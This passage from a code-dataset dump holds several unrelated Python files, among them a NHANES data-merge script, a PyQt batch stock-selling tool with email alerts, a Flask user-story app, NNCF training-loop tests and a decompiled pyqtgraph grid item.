guardKill()\n p = proofType()\n t = killType()\n w = weaponUsed()\n return p, t, w, g","sub_path":"bountyUtils/bountyObjectives.py","file_name":"bountyObjectives.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288133785","text":"def solution(arr, K):\n answer = 0\n size = len(arr)\n for i in range(size-2):\n for j in range(i+1, size-1):\n for k in range(j+1, size):\n tot = sum([arr[i], arr[j], arr[k]])\n answer += 1 if tot % K == 0 else 0\n print(f'{arr[i]}, {arr[j]}, {arr[k]}, tot={tot}, answer={answer}')\n return answer\n\nif __name__ == \"__main__\":\n arr, k = [1,2,3,4,5], 3\n print(f'arr={arr}, k={k}, answer={solution(arr,k)}');","sub_path":"cp1_2_04_multiple_of_k.py","file_name":"cp1_2_04_multiple_of_k.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"430651090","text":"\"\"\"\nMerge some NHANES data files to produce a dataset that can\nbe used to demonstrate the Kockoff FDR procedure.\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/DR1TOT_C.XPT\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/BPX_C.XPT\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/BMX_C.XPT\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/DEMO_C.XPT\n\"\"\"\n\nimport pandas as pd\n\ndx0 = pd.read_sas(\"DEMO_C.XPT\")\ndx0 = dx0[[\"SEQN\", \"RIDAGEYR\", \"RIAGENDR\", \"DMDEDUC2\", \"RIDRETH1\"]]\n\ndx1 = pd.read_sas(\"BMX_C.XPT\")\ndx1 = dx1[[\"SEQN\", \"BMXBMI\"]]\n\ndx2 = pd.read_sas(\"BPX_C.XPT\")\ndx2 = dx2[[\"SEQN\", \"BPXSY1\"]]\n\ndx3 = pd.read_sas(\"DR1TOT_C.XPT\")\nseqn = dx3.SEQN\ndx3 = dx3.loc[:, \"DR1TKCAL\":]\ndx3[\"SEQN\"] = seqn\n\ndx = pd.merge(dx0, dx1, left_on=\"SEQN\", right_on=\"SEQN\")\ndx = pd.merge(dx, dx2, left_on=\"SEQN\", right_on=\"SEQN\")\ndx = pd.merge(dx, dx3, left_on=\"SEQN\", right_on=\"SEQN\")\n\n","sub_path":"LargeScale/nhanes_data.py","file_name":"nhanes_data.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"65893225","text":"import json\n\ndef gather_text(schema, current_path):\n for key, value in schema.items():\n if key in ('title', 'description') and isinstance(value, str):\n yield value, current_path + '/' + key\n if isinstance(value, dict):\n yield from gather_text(value, current_path + '/' + key)\n\n\ndef extract(fileobj, keywords, comment_tags, options):\n schema = json.loads(fileobj.read().decode())\n for text, current_path in gather_text(schema, ''):\n yield 1, '', text, [current_path]\n\n# for lineno, funcname, messages, comments in results:\n\n\n","sub_path":"standard/schema/utils/jsonschema_extract.py","file_name":"jsonschema_extract.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"285277085","text":"# Is a number prime?\n\n# Define a function that takes one integer argument and returns logical\n# value true or false depending on if the integer is a prime\n\n# You can assume you will be given an integer input.\n\n# You can not assume that the integer will be only positive. You may be\n# given negative numbers as well (or 0).\n\n# NOTE on performance: There are no fancy optimizations required, but\n# still the most trivial solutions might time out. Numbers go up to\n# 2^31 or 2,147,483,648 (or similar, depends on language version). 
Looping all the way\n# up to n, or n/2, will be too slow.\n\nimport pytest\n\ndef is_prime(num):\n # Handle small numbers and multiples of 2, 3 and 5 up front\n if num <= 1: return False\n if num == 2 or num == 3 or num == 5: return True\n if num % 2 == 0 or num % 3 == 0 or num % 5 == 0:\n return False\n\n i = 5\n # 6k +/- 1 trial division; <= is needed so squares of primes (e.g. 121) are rejected\n while i ** 2 <= num:\n if num % i == 0 or num % (i + 2) == 0: return False\n i += 6\n\n return True\n\nnumbers = [\n (5, True),\n (9, False),\n (17, True),\n (25, False),\n (30, False),\n (37, True),\n]\n\n@pytest.mark.parametrize('num, result', numbers)\ndef test_prime(num, result):\n assert is_prime(num) == result\n","sub_path":"Python/tests/test_IsPrime.py","file_name":"test_IsPrime.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566274966","text":"\"\"\"\n@ File: batch_sell_main.py\n@ Author: pleiadesian\n@ Datetime: 2020-02-14 08:55\n\"\"\"\nimport os\nimport sys\nimport math\nimport tushare as ts\nimport smtplib\nimport datetime\nimport frontend.batch_sell as bs\nimport api.ts_map as tm\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom frontend import setfocus\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox, QWidget\nfrom PyQt5.QtCore import QTimer\n\nINTERVAL = 3000\nWATCHING_GREEN = 0\nWATCHING_RED = 1\n\n\ndef get_new_a1p(codes):\n infos = ts.get_realtime_quotes(codes).values\n a1ps = []\n for info in infos:\n # get ask price 1\n a1ps.append(float(info[21]))\n return a1ps\n\n\nclass BatchSellMain(QMainWindow, bs.Ui_MainWindow):\n def __init__(self, parent=None):\n super(BatchSellMain, self).__init__(parent)\n self.setupUi(self)\n self.window_info = setfocus.init_fs()\n self.codes = []\n self.price = dict()\n self.amount = dict()\n self.watch = dict()\n self.watching = False\n self.watching_mode = WATCHING_GREEN\n self.call_auction_complete = False\n\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.check_watch)\n self.timer.start(INTERVAL)\n\n def confirm(self):\n price_text = self.lineEdit_price.text()\n code_text = self.lineEdit_stock.text()\n amount_text = self.lineEdit_amount.text()\n percent_text = self.lineEdit_percent.text()\n watch_text_low = self.lineEdit_watch_price_low.text()\n watch_text_high = self.lineEdit_watch_price_high.text()\n\n if watch_text_low == '':\n if price_text == '':\n QMessageBox.question(self, \"警告\", \"卖出价格未设置!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n price = float(price_text)\n if price > 10.0:\n QMessageBox.question(self, \"警告\", \"价格设置过低!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n if amount_text == '':\n amount_text = '全仓卖出'\n sell_amount = None\n else:\n amount = int(amount_text)\n if amount <= 0 or amount % 100 != 0:\n QMessageBox.question(self, \"警告\", \"持仓数填写错误!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n if percent_text == '':\n percent = 1\n percent_text = '1'\n else:\n if float(percent_text) < 1:\n QMessageBox.question(self, \"警告\", \"卖出比例填写错误!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n percent = 1 / float(percent_text)\n sell_amount = math.ceil(amount * percent / 100) * 100\n amount_text = '持仓' + amount_text + '股 卖出' + str(sell_amount) + '股' + '(1/' + percent_text + '仓位)'\n if code_text in self.codes:\n QMessageBox.question(self, \"警告\", \"该股票已加入卖出计划!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n if code_text not in tm.name_mapping:\n
QMessageBox.question(self, \"警告\", \"检测到股票代码输入错误,请重新输入(注意股票代码之间必须有且仅有1个空格)\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n\n new_line = code_text + ' ' + tm.name_mapping[code_text] + ' 低' + price_text + '% ' + amount_text + '\\n'\n self.label_stock.setText(self.label_stock.text() + new_line)\n self.codes.append(code_text)\n self.price[code_text] = price_text\n if sell_amount is not None:\n self.amount[code_text] = str(sell_amount)\n else:\n price_low = float(watch_text_low)\n price_high = float(watch_text_high)\n new_line = code_text + ' ' + tm.name_mapping[code_text] + ' 监控卖出 止损:' + watch_text_low + ' 止盈:' + \\\n watch_text_high\n self.label_stock.setText(self.label_stock.text() + new_line)\n self.codes.append(code_text)\n self.watch[code_text] = (price_low, price_high)\n\n def delete(self):\n code_text = self.lineEdit_stock.text()\n stock_text = self.label_stock.text()\n if code_text not in self.codes:\n QMessageBox.question(self, \"警告\", \"该股票代码未加入卖出计划\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n new_text = ''\n stocks = stock_text.split('\\n')\n for stock in stocks:\n if stock.startswith(code_text):\n continue\n new_text += stock + '\\n'\n self.label_stock.setText(new_text)\n self.codes.remove(code_text)\n del self.price[code_text]\n if code_text in self.amount:\n del self.amount[code_text]\n\n def check_watch(self):\n if self.watching:\n if self.watching_mode == WATCHING_GREEN:\n a1_ps = get_new_a1p(self.codes)\n if len(a1_ps) != len(self.codes) or len(self.codes) == 0:\n QMessageBox.question(self, \"警告\", \"检测到股票代码输入错误,请重新输入(注意股票代码之间必须有且仅有1个空格)\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n self.pushButton_watch_sell.setText('监控卖出')\n self.watching = False\n return\n for code, ask_price in zip(self.codes, a1_ps):\n sell_price_low = self.watch[code][0]\n sell_price_high = self.watch[code][1]\n if sell_price_low > ask_price:\n setfocus.sell_code(code, str(ask_price), None, self.window_info)\n self.codes.remove(code)\n del self.watch[code]\n self.send_email(code + '已自动卖出')\n elif sell_price_high < ask_price:\n self.send_email(code + '已突破预期价格')\n else:\n if '09:24:00' < datetime.datetime.now().strftime('%H:%M:%S') < '09:25:00':\n a1_ps = get_new_a1p(self.codes)\n if len(a1_ps) != len(self.codes) or len(self.codes) == 0:\n assert False\n for code, ask_price in zip(self.codes, a1_ps):\n sell_price = str(round(ask_price * (1 - float(self.price[code]) / 100), 2))\n if code in self.amount:\n amt = self.amount[code]\n else:\n amt = None\n setfocus.sell_code(code, sell_price, amt, self.window_info)\n self.codes = []\n self.watch.clear()\n self.send_email('红盘集合竞价卖出完毕')\n\n def watch_sell_start_green(self):\n if self.pushButton_watch_sell_green.text() == '绿盘监控卖出':\n self.pushButton_watch_sell_green.setText('取消')\n self.pushButton_sell.setEnabled(False)\n self.pushButton_watch_sell_red.setEnabled(False)\n self.watching_mode = WATCHING_GREEN\n self.watching = True\n else:\n self.pushButton_watch_sell_green.setText('绿盘监控卖出')\n self.pushButton_sell.setEnabled(True)\n self.pushButton_watch_sell_red.setEnabled(True)\n self.watching = False\n\n def watch_sell_start_red(self):\n if self.pushButton_watch_sell_red.text() == '红盘监控卖出':\n self.pushButton_watch_sell_red.setText('取消')\n self.pushButton_sell.setEnabled(False)\n self.pushButton_watch_sell_green.setEnabled(False)\n self.watching_mode = WATCHING_RED\n self.watching = True\n else:\n self.pushButton_watch_sell_red.setText('红盘监控卖出')\n self.pushButton_sell.setEnabled(True)\n 
self.pushButton_watch_sell_green.setEnabled(True)\n self.watching = False\n\n def batch_sell_start(self):\n a1_ps = get_new_a1p(self.codes)\n if len(a1_ps) != len(self.codes) or len(self.codes) == 0:\n QMessageBox.question(self, \"警告\", \"检测到股票代码输入错误,请重新输入(注意股票代码之间必须有且仅有1个空格)\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n for code, ask_price in zip(self.codes, a1_ps):\n sell_price = str(round(ask_price * (1 - float(self.price[code]) / 100), 2))\n if code in self.amount:\n amt = self.amount[code]\n else:\n amt = None\n setfocus.sell_code(code, sell_price, amt, self.window_info)\n QMessageBox.question(self, \"提示\", \"批量委托卖出完毕\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n\n @staticmethod\n def send_email(text):\n sender = '574402791@qq.com'\n password = os.getenv('MAIL_PASSWORD')\n receivers = 'wzl574402791@outlook.com'\n smtp_server = 'smtp.qq.com'\n\n # Three arguments: the text content, 'plain' for the text format, and 'utf-8' for the encoding\n message = MIMEText(text, 'plain', 'utf-8')\n message['From'] = Header(sender)\n message['To'] = Header(receivers)\n message['Subject'] = Header('股价预警', 'utf-8')\n\n while True:\n try:\n server = smtplib.SMTP_SSL(host=smtp_server)\n server.connect(host=smtp_server, port=465)\n\n server.login(sender, password)\n server.sendmail(sender, receivers, message.as_string())\n break\n except smtplib.SMTPException:\n continue\n\n def select_zx(self):\n if self.radioButton_zx.isChecked():\n self.window_info = setfocus.change_fs('中信')\n\n def select_ct(self):\n if self.radioButton_ct.isChecked():\n self.window_info = setfocus.change_fs('财通')\n\n def select_tdx(self):\n if self.radioButton_tdx.isChecked():\n self.window_info = setfocus.change_fs('通达')\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n batch_sell_main = BatchSellMain()\n batch_sell_main.show()\n app.exec_()\n","sub_path":"frontend/batch_sell_main.py","file_name":"batch_sell_main.py","file_ext":"py","file_size_in_byte":10940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"223029020","text":"from flask import Flask, render_template, redirect, request, session\nimport csv\nimport uuid\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET'])\n@app.route('/list', methods=['GET'])\ndef route_list(*argv):\n with open('stories.csv', 'r') as csvfile:\n stories = []\n for row in csvfile:\n stories.append(row.split(';'))\n return render_template('list.html', stories=stories)\n\n\n@app.route('/story', methods=['GET', 'POST'])\n# using form.html template\n# add new story for the /story page, it is an empty form with a create button\ndef route_story():\n if request.method == 'GET':\n return render_template('form.html')\n\n with open('stories.csv', 'a') as csvfile:\n exportdata = csv.writer(csvfile, delimiter=';',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n exportdata.writerow([str(uuid.uuid4())[:6], \\\n request.form['title'], \\\n request.form['descr'], \\\n request.form['accr'], \\\n request.form['businessvalue'], \\\n request.form['estimation'], \\\n request.
form['status']])\n\n return 'The new User Story Has been Created!'\n\n\n# @app.route('/story/', methods=['GET', 'POST'])\n# using form.html\n# the same form as /story page, but filled in with data of the given User Story\n# Update button should update existing entry, not create a new\n# def route_edit(story_id=None):\n# formdata = cgi.FieldStorage()\n# title = formdata.getvalue('title')\n# with open (\"stories.csv\")\n# return render_template('form.html', story_id=story_id)\n\n\nif __name__ == '__main__':\n # app.secret_key = '4Rkj4jo'\n app.run(debug=True, port=5000)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584275652","text":"#from PIL import Image\nfrom PIL.ExifTags import TAGS, GPSTAGS\nimport glob\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport piexif\nfrom exif import Image\nimport sys\nimport os\n\n\nim_path = sys.argv[1]\n\nfolder = im_path.split('/')[0] + '/' + im_path.split('/')[1]\n\nexif_folder = folder + '/exif'\nexif_list = glob.glob(exif_folder + '/*')\n\nf = open(exif_list[0])\ndata = json.load(f)\n\nim_name = im_path.split('/')[-1].split('.')[0]\nnew_im_name = folder + '/localize/' + im_name + 'exif.jpg'\n\n#dummy gps info so there is no error in sfm!\nGPSInfo = {1: 'N', 2: ((36, 1), (7, 1), (5263, 100)), 3: 'W', 4: ((115, 1), (8, 1), (5789, 100)), 5: b'\\x00', 6: (241175, 391), 7: ((19, 1), (8, 1), (40, 1)), 12: 'K', 13: (0, 1), 16: 'T', 17: (1017664, 4813), 23: 'T', 24: (1017664, 4813), 29: '2019:01:11', 31: (65, 1)}\n\nwith open(im_path, 'rb') as image_file:\n \n im = Image(image_file)\n \n im.make = data['make']\n im.model = data['model']\n \n im.camera = data['camera']\n \n im.GPSInfo = GPSInfo\n \n \nwith open(new_im_name, 'wb') as new_image_file:\n new_image_file.write(im.get_file())\n\n\nwith open(new_im_name, 'rb') as image_file:\n imtest = Image(image_file)\n \nos.system('rm '+ im_path)\n\nos.system('cp ' + exif_list[0] + ' ' + exif_list[0] + '1')\n\nos.system('mv ' + exif_list[0] + '1' + ' ' + exif_folder +'/' +im_name + 'exif.jpg.exif')\n","sub_path":"ICG/write_exif2file.py","file_name":"write_exif2file.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319188899","text":"\"\"\"\n Copyright (c) 2021 Intel Corporation\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport pytest\nfrom functools import partial\n\nimport torch\nfrom torch import nn\nfrom torch.optim import SGD\nfrom torch.nn import functional as F\n\nfrom nncf.torch import AdaptiveCompressionTrainingLoop\nfrom nncf.torch import EarlyExitCompressionTrainingLoop\nfrom nncf.torch.initialization import register_default_init_args\n\nfrom tests.torch.helpers import create_compressed_model_and_algo_for_test\nfrom tests.torch.helpers import LeNet\nfrom tests.torch.helpers import create_ones_mock_dataloader\nfrom tests.torch.helpers import 
set_torch_seed\nfrom tests.torch.sparsity.magnitude.test_helpers import get_basic_magnitude_sparsity_config\nfrom tests.torch.quantization.test_quantization_helpers import get_quantization_config_without_range_init\n\n\ndef create_finetuned_lenet_model_and_dataloader(config, eval_fn, finetuning_steps,\n learning_rate=1e-3):\n with set_torch_seed():\n train_loader = create_ones_mock_dataloader(config, num_samples=10)\n model = LeNet()\n for param in model.parameters():\n nn.init.uniform_(param, a=0.0, b=0.01)\n\n data_loader = iter(train_loader)\n optimizer = SGD(model.parameters(), lr=learning_rate)\n for _ in range(finetuning_steps):\n optimizer.zero_grad()\n x, y_gt = next(data_loader)\n y = model(x)\n loss = F.mse_loss(y.sum(), y_gt)\n loss.backward()\n optimizer.step()\n\n config = register_default_init_args(config,\n train_loader=train_loader,\n model_eval_fn=partial(eval_fn, train_loader=train_loader))\n model, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n return model, train_loader, compression_ctrl\n\n\n@pytest.mark.parametrize(\n ('max_accuracy_degradation',\n 'final_compression_rate',\n 'reference_final_metric'),\n (\n ({'maximal_relative_accuracy_degradation': 0.01}, 0.66742, 0.996252),\n ({'maximal_relative_accuracy_degradation': 100.0}, 0.94136, 0.876409),\n ({'maximal_absolute_accuracy_degradation': 0.10}, 0.767040, 0.938572),\n )\n)\ndef test_adaptive_compression_training_loop(max_accuracy_degradation,\n final_compression_rate,\n reference_final_metric,\n num_steps=10, learning_rate=1e-3,\n initial_training_phase_epochs=5,\n patience_epochs=3,\n init_finetuning_steps=10):\n def validate_fn(model, epoch=0, train_loader=None):\n with set_torch_seed():\n train_loader = iter(train_loader)\n loss = torch.FloatTensor([0])\n with torch.no_grad():\n for _ in range(num_steps):\n x, y_gt = next(train_loader)\n y = model(x)\n loss += F.mse_loss(y.sum(), y_gt)\n return 1 - loss.item()\n\n input_sample_size = [1, 1, LeNet.INPUT_SIZE[-1], LeNet.INPUT_SIZE[-1]]\n config = get_basic_magnitude_sparsity_config(input_sample_size=input_sample_size)\n\n params = {\n \"initial_training_phase_epochs\": initial_training_phase_epochs,\n \"patience_epochs\": patience_epochs,\n }\n params.update(max_accuracy_degradation)\n accuracy_aware_config = {\n \"accuracy_aware_training\": {\n \"mode\": \"adaptive_compression_level\",\n \"params\": params\n }\n }\n\n config.update(accuracy_aware_config)\n\n model, train_loader, compression_ctrl = create_finetuned_lenet_model_and_dataloader(config,\n validate_fn,\n init_finetuning_steps)\n\n def train_fn(compression_ctrl, model, optimizer,\n train_loader=train_loader, **kwargs):\n with set_torch_seed():\n train_loader = iter(train_loader)\n for _ in range(num_steps):\n compression_ctrl.scheduler.step()\n optimizer.zero_grad()\n x, y_gt = next(train_loader)\n y = model(x)\n loss = F.mse_loss(y.sum(), y_gt)\n loss.backward()\n optimizer.step()\n\n def configure_optimizers_fn():\n optimizer = SGD(model.parameters(), lr=learning_rate)\n return optimizer, None\n\n acc_aware_training_loop = AdaptiveCompressionTrainingLoop(config, compression_ctrl)\n model = acc_aware_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(validate_fn, train_loader=train_loader),\n configure_optimizers_fn=configure_optimizers_fn)\n assert compression_ctrl.compression_rate == pytest.approx(final_compression_rate, 1e-3)\n assert validate_fn(model, train_loader=train_loader) == pytest.approx(reference_final_metric, 
1e-4)\n\n\n@pytest.mark.parametrize(\n 'max_accuracy_degradation',\n (({'maximal_relative_accuracy_degradation': 30.0}), ({'maximal_relative_accuracy_degradation': 1.0}),\n ({'maximal_absolute_accuracy_degradation': 0.30}), ({'maximal_absolute_accuracy_degradation': 0.05}))\n)\ndef test_early_exit_training_loop(max_accuracy_degradation,\n num_steps=10, learning_rate=1e-3,\n maximal_total_epochs=100,\n init_finetuning_steps=10):\n def validate_fn(model, epoch=0, train_loader=None):\n with set_torch_seed():\n train_loader = iter(train_loader)\n loss = torch.FloatTensor([0])\n with torch.no_grad():\n for _ in range(num_steps):\n x, y_gt = next(train_loader)\n y = model(x)\n loss += F.mse_loss(y.sum(), y_gt)\n return 1 - loss.item()\n\n config = get_quantization_config_without_range_init(LeNet.INPUT_SIZE[-1])\n params = {\n \"maximal_total_epochs\": maximal_total_epochs,\n }\n params.update(max_accuracy_degradation)\n\n accuracy_aware_config = {\n \"accuracy_aware_training\": {\n \"mode\": \"early_exit\",\n \"params\": params\n }\n }\n\n config.update(accuracy_aware_config)\n\n model, train_loader, compression_ctrl = create_finetuned_lenet_model_and_dataloader(config,\n validate_fn,\n init_finetuning_steps)\n\n def train_fn(compression_ctrl, model, epoch, optimizer, lr_scheduler,\n train_loader=train_loader):\n with set_torch_seed():\n train_loader = iter(train_loader)\n for _ in range(num_steps):\n compression_ctrl.scheduler.step()\n optimizer.zero_grad()\n x, y_gt = next(train_loader)\n y = model(x)\n loss = F.mse_loss(y.sum(), y_gt)\n loss.backward()\n optimizer.step()\n\n def configure_optimizers_fn():\n optimizer = SGD(model.parameters(), lr=learning_rate)\n return optimizer, None\n\n early_stopping_training_loop = EarlyExitCompressionTrainingLoop(config, compression_ctrl)\n model = early_stopping_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(validate_fn, train_loader=train_loader),\n configure_optimizers_fn=configure_optimizers_fn)\n original_model_accuracy = model.original_model_accuracy\n compressed_model_accuracy = validate_fn(model, train_loader=train_loader)\n if \"maximal_absolute_accuracy_degradation\" in max_accuracy_degradation:\n assert (original_model_accuracy - compressed_model_accuracy) <= \\\n max_accuracy_degradation[\"maximal_absolute_accuracy_degradation\"]\n else:\n assert (original_model_accuracy - compressed_model_accuracy) / original_model_accuracy * 100 <= \\\n max_accuracy_degradation[\"maximal_relative_accuracy_degradation\"]\n\n\n@pytest.mark.parametrize(\n ('max_accuracy_degradation', 'exit_epoch_number'),\n (({'maximal_relative_accuracy_degradation': 1.0}, 6),\n ({'maximal_relative_accuracy_degradation': 30.0}, 10),\n ({'maximal_absolute_accuracy_degradation': 0.1}, 3))\n)\ndef test_early_exit_with_mock_validation(max_accuracy_degradation, exit_epoch_number,\n maximal_total_epochs=100):\n epoch_counter = 0\n\n def mock_validate_fn(model, init_step=False, epoch=0):\n original_metric = 0.85\n if init_step:\n return original_metric\n nonlocal epoch_counter\n epoch_counter = epoch\n if \"maximal_relative_accuracy_degradation\" in max_accuracy_degradation:\n return original_metric * (1 - 0.01 * max_accuracy_degradation['maximal_relative_accuracy_degradation']) * (\n epoch / exit_epoch_number)\n return (original_metric - max_accuracy_degradation['maximal_absolute_accuracy_degradation']) * \\\n epoch / exit_epoch_number\n\n config = get_quantization_config_without_range_init(LeNet.INPUT_SIZE[-1])\n\n params = {\n \"maximal_total_epochs\": 
maximal_total_epochs\n }\n params.update(max_accuracy_degradation)\n accuracy_aware_config = {\n \"accuracy_aware_training\": {\n \"mode\": \"early_exit\",\n \"params\": params\n }\n }\n\n config.update(accuracy_aware_config)\n\n train_loader = create_ones_mock_dataloader(config, num_samples=10)\n model = LeNet()\n\n config = register_default_init_args(config,\n train_loader=train_loader,\n model_eval_fn=partial(mock_validate_fn, init_step=True))\n\n model, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n def train_fn(compression_ctrl, model, epoch, optimizer, lr_scheduler,\n train_loader=train_loader):\n pass\n\n def configure_optimizers_fn():\n return None, None\n\n early_stopping_training_loop = EarlyExitCompressionTrainingLoop(config, compression_ctrl,\n dump_checkpoints=False)\n model = early_stopping_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(mock_validate_fn),\n configure_optimizers_fn=configure_optimizers_fn)\n # Epoch number starts from 0\n assert epoch_counter == exit_epoch_number\n\n\n@pytest.mark.parametrize('aa_config', (\n {\n \"accuracy_aware_training\": {\n \"mode\": \"early_exit\",\n \"params\": {\n \"maximal_relative_accuracy_degradation\": 1,\n \"maximal_total_epochs\": 1,\n }\n },\n \"compression\": [\n {\n \"algorithm\": \"filter_pruning\",\n },\n {\n \"algorithm\": \"rb_sparsity\",\n }\n ]\n },\n {\n \"accuracy_aware_training\": {\n \"mode\": \"adaptive_compression_level\",\n \"params\": {\n \"maximal_relative_accuracy_degradation\": 1,\n \"initial_training_phase_epochs\": 1,\n \"maximal_total_epochs\": 1,\n \"patience_epochs\": 10\n }\n },\n \"compression\": [\n {\n \"algorithm\": \"filter_pruning\",\n }\n ]\n }\n)\n )\ndef test_mock_dump_checkpoint(aa_config):\n is_called_dump_checkpoint_fn = False\n\n def mock_dump_checkpoint_fn(model, compression_controller, accuracy_aware_runner, aa_log_dir):\n from nncf.api.compression import CompressionAlgorithmController\n from nncf.common.accuracy_aware_training.runner import TrainingRunner\n assert isinstance(model, torch.nn.Module)\n assert isinstance(compression_controller, CompressionAlgorithmController)\n assert isinstance(accuracy_aware_runner, TrainingRunner)\n assert isinstance(aa_log_dir, str)\n nonlocal is_called_dump_checkpoint_fn\n is_called_dump_checkpoint_fn = True\n\n config = get_quantization_config_without_range_init(LeNet.INPUT_SIZE[-1])\n train_loader = create_ones_mock_dataloader(aa_config, num_samples=10)\n model = LeNet()\n config.update(aa_config)\n\n def train_fn(compression_ctrl, model, epoch, optimizer, lr_scheduler,\n train_loader=train_loader):\n pass\n\n def mock_validate_fn(model, init_step=False, epoch=0):\n return 80\n\n def configure_optimizers_fn():\n optimizer = SGD(model.parameters(), lr=0.001)\n return optimizer, None\n\n config = register_default_init_args(config,\n train_loader=train_loader,\n model_eval_fn=partial(mock_validate_fn, init_step=True))\n\n model, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n early_stopping_training_loop = EarlyExitCompressionTrainingLoop(config, compression_ctrl,\n dump_checkpoints=True)\n model = early_stopping_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(mock_validate_fn),\n configure_optimizers_fn=configure_optimizers_fn,\n dump_checkpoint_fn=mock_dump_checkpoint_fn)\n assert 
is_called_dump_checkpoint_fn\n","sub_path":"tests/torch/accuracy_aware_training/test_training_loop.py","file_name":"test_training_loop.py","file_ext":"py","file_size_in_byte":14790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"544262081","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.12-x86_64/egg/dicom_tools/pyqtgraph/opengl/items/GLGridItem.py\n# Compiled at: 2018-05-21 04:28:19\n# Size of source mod 2**32: 2277 bytes\nimport numpy as np\nfrom OpenGL.GL import *\nfrom ..GLGraphicsItem import GLGraphicsItem\nfrom ... import QtGui\n__all__ = [\n 'GLGridItem']\n\nclass GLGridItem(GLGraphicsItem):\n __doc__ = '\\n **Bases:** :class:`GLGraphicsItem `\\n \\n Displays a wire-grame grid. \\n '\n\n def __init__(self, size=None, color=None, antialias=True, glOptions='translucent'):\n GLGraphicsItem.__init__(self)\n self.setGLOptions(glOptions)\n self.antialias = antialias\n if size is None:\n size = QtGui.QVector3D(20, 20, 1)\n self.setSize(size=size)\n self.setSpacing(1, 1, 1)\n\n def setSize(self, x=None, y=None, z=None, size=None):\n \"\"\"\n Set the size of the axes (in its local coordinate system; this does not affect the transform)\n Arguments can be x,y,z or size=QVector3D().\n \"\"\"\n if size is not None:\n x = size.x()\n y = size.y()\n z = size.z()\n self._GLGridItem__size = [\n x, y, z]\n self.update()\n\n def size(self):\n return self._GLGridItem__size[:]\n\n def setSpacing(self, x=None, y=None, z=None, spacing=None):\n \"\"\"\n Set the spacing between grid lines.\n Arguments can be x,y,z or spacing=QVector3D().\n \"\"\"\n if spacing is not None:\n x = spacing.x()\n y = spacing.y()\n z = spacing.z()\n self._GLGridItem__spacing = [\n x, y, z]\n self.update()\n\n def spacing(self):\n return self._GLGridItem__spacing[:]\n\n def paint(self):\n self.setupGLState()\n if self.antialias:\n glEnable(GL_LINE_SMOOTH)\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n glHint(GL_LINE_SMOOTH_HINT, GL_NICEST)\n glBegin(GL_LINES)\n x, y, z = self.size()\n xs, ys, zs = self.spacing()\n xvals = np.arange(-x / 2.0, x / 2.0 + xs * 0.001, xs)\n yvals = np.arange(-y / 2.0, y / 2.0 + ys * 0.001, ys)\n glColor4f(1, 1, 1, 0.3)\n for x in xvals:\n glVertex3f(x, yvals[0], 0)\n glVertex3f(x, yvals[(-1)], 0)\n\n for y in yvals:\n glVertex3f(xvals[0], y, 0)\n glVertex3f(xvals[(-1)], y, 0)\n\n 